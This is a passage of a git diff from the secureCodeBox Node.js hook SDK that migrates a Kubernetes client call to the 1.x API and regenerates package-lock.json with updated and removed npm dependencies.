+ severities: { + informational: severityCount(findings, "INFORMATIONAL"), + low: severityCount(findings, "LOW"), + medium: severityCount(findings, "MEDIUM"), + high: severityCount(findings, "HIGH"), + }, + categories: Object.fromEntries(findingCategories.entries()), }, - categories: Object.fromEntries(findingCategories.entries()), }, }, }, - undefined, - undefined, - undefined, - { headers: { "content-type": "application/merge-patch+json" } }, + setHeaderOptions("Content-Type", PatchStrategy.MergePatch), ); console.log("Updated status successfully"); } async function main() { + console.log(`Starting hook for Scan "${scanName}"`); + let scan; try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, - ); - scan = body; + scan = await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + namespace: namespace, + plural: "scans", + name: scanName, + }); } catch (err) { console.error("Failed to get Scan from the kubernetes api"); console.error(err); diff --git a/hook-sdk/nodejs/package-lock.json b/hook-sdk/nodejs/package-lock.json index 1ebda66e4b..1dcba7c7f5 100644 --- a/hook-sdk/nodejs/package-lock.json +++ b/hook-sdk/nodejs/package-lock.json @@ -1,7 +1,7 @@ { "name": "@securecodebox/hook-sdk-nodejs", "version": "1.0.0", - "lockfileVersion": 2, + "lockfileVersion": 3, "requires": true, "packages": { "": { @@ -9,42 +9,14 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", - "axios": "^1.7.9", - "ws": "^8.13.0" - } - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" + "@kubernetes/client-node": "^1.3.0" } }, "node_modules/@jsep-plugin/assignment": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -56,6 +28,7 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "license": "MIT", "engines": { "node": ">= 10.16.0" }, @@ -64,69 +37,70 @@ } }, "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "license": "Apache-2.0", "dependencies": { - "byline": "^5.0.0", + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" + "node_modules/@types/js-yaml": { + "version": "4.0.9", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.9.tgz", + "integrity": "sha512-k4MGaQl5TGo/iipqb2UDG2UwjXziSWkh0uysQelTlJpX1qGlpUZYm8PnO4DxG1qBomtJUdYJ6qR6xdIah10JLg==", + "license": "MIT" + }, + "node_modules/@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", + "license": "MIT", + "dependencies": { + "undici-types": "~6.21.0" } }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "node_modules/@types/node-fetch": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", + "license": "MIT", "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" + "node_modules/@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", + "license": "MIT", + "dependencies": { + "@types/node": "*" } }, - "node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", + "node_modules/agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==", + "license": "MIT", "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" + "node": ">= 14" } }, "node_modules/argparse": { @@ -134,121 +108,102 @@ "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "node_modules/asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", - "engines": { - "node": ">=0.8" - } - }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" + "node_modules/b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==", + "license": "Apache-2.0" }, - "node_modules/axios": { - "version": "1.7.9", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.7.9.tgz", - "integrity": "sha512-LhLcE7Hbiryz8oMDdDptSrWowmB4Bl6RCt6sIJKpRB4XtVf0iEgewX3au/pJqm+Py1kCASkb/FFKjxQaLtxJvw==", - "dependencies": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } + "node_modules/bare-events": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/bare-events/-/bare-events-2.5.4.tgz", + "integrity": "sha512-+gFfDkR8pj4/TrWCGUGWmJIkBwuxPS5F+a5yWjOHQt2hHvNZd5YLzadjmDUtFmMM4y429bnKLa8bYBMHcYdnQA==", + "license": "Apache-2.0", + "optional": true }, - "node_modules/axios/node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "node_modules/bare-fs": { + "version": "4.1.6", + "resolved": "https://registry.npmjs.org/bare-fs/-/bare-fs-4.1.6.tgz", + "integrity": "sha512-25RsLF33BqooOEFNdMcEhMpJy8EoR88zSMrnOQOaM3USnOK2VmaJ1uaQEwPA6AQjrv1lXChScosN6CzbwbO9OQ==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" + "bare-events": "^2.5.4", + "bare-path": "^3.0.0", + "bare-stream": "^2.6.4" }, "engines": { - "node": ">= 6" + "bare": ">=1.16.0" + }, + "peerDependencies": { + "bare-buffer": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + } } }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "dependencies": { - "tweetnacl": "^0.14.3" + "node_modules/bare-os": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/bare-os/-/bare-os-3.6.1.tgz", + "integrity": "sha512-uaIjxokhFidJP+bmmvKSgiMzj2sV5GPHaZVAIktcxcpCyBFFWO+YlikVAdhmUo2vYFvFhOXIAlldqV29L8126g==", + "license": "Apache-2.0", + "optional": true, + "engines": { + "bare": ">=1.14.0" } }, - "node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "node_modules/bare-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bare-path/-/bare-path-3.0.0.tgz", + "integrity": "sha512-tyfW2cQcB5NN8Saijrhqn0Zh7AnFNsnczRcuWODH0eYAXBsJ5gVxAUuNr7tsHSC6IZ77cA0SitzT+s47kot8Mw==", + "license": "Apache-2.0", + "optional": true, "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "engines": { - "node": ">=0.10.0" + "bare-os": "^3.0.1" } }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" + "node_modules/bare-stream": { + "version": "2.6.5", + "resolved": "https://registry.npmjs.org/bare-stream/-/bare-stream-2.6.5.tgz", + "integrity": "sha512-jSmxKJNJmHySi6hC42zlZnq00rga4jjxcgNZjY9N5WlOe/iOoGRtdwGsHzQv2RlH2KOYMwGUXhf2zXd32BA9RA==", + "license": "Apache-2.0", + "optional": true, + "dependencies": { + "streamx": "^2.21.0" + }, + "peerDependencies": { + "bare-buffer": "*", + "bare-events": "*" + }, + "peerDependenciesMeta": { + "bare-buffer": { + "optional": true + }, + "bare-events": { + "optional": true + } } }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "node_modules/call-bind-apply-helpers": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "license": "MIT", "dependencies": { - "color-name": "~1.1.4" + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" }, "engines": { - "node": ">=7.0.0" + "node": ">= 0.4" } }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", @@ -260,33 +215,21 @@ "node": ">= 0.8" } }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "node_modules/debug": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.1.tgz", + "integrity": "sha512-KcKCqiftBJcZr++7ykoDIEwSa3XWowTfNPo92BYxjXiyYEVrUQh2aLyhxBCwww+heortUFxEJYcRzosstTEBYQ==", + "license": "MIT", "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" + "ms": "^2.1.3" }, "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dependencies": { - "assert-plus": "^1.0.0" + "node": ">=6.0" }, - "engines": { - "node": ">=0.10" + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, "node_modules/delayed-stream": { @@ -297,169 +240,214 @@ "node": ">=0.4.0" } }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" } }, - "node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } }, - "node_modules/extsprintf": { + "node_modules/es-errors": { "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "engines": [ - "node >=0.6.0" - ] + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + } }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } }, - "node_modules/fast-json-stable-stringify": { + "node_modules/es-set-tostringtag": { "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } + "engines": { + "node": ">= 0.4" } }, - "node_modules/foreground-child": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.0.tgz", - "integrity": "sha512-Ld2g8rrAyMYFXBhEqMz8ZAHBi4J4uS1i/CxGMDnjyFWddMXLVcDp051DZfu+t7+ab7Wv6SMqpWmyFIj5UbfFvg==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", + "license": "MIT" + }, + "node_modules/form-data": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", + "license": "MIT", "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" }, "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" + "node": ">= 6" } }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "engines": { - "node": "*" + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "license": "MIT", "dependencies": { - "assert-plus": "^1.0.0" + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "license": "MIT", "dependencies": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" }, - "bin": { - "glob": "dist/esm/bin.mjs" + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "license": "MIT", + "engines": { + "node": ">= 0.4" }, "funding": { - "url": "https://github.com/sponsors/isaacs" + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", + "license": "MIT", "engines": { - "node": ">=4" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "license": "MIT", 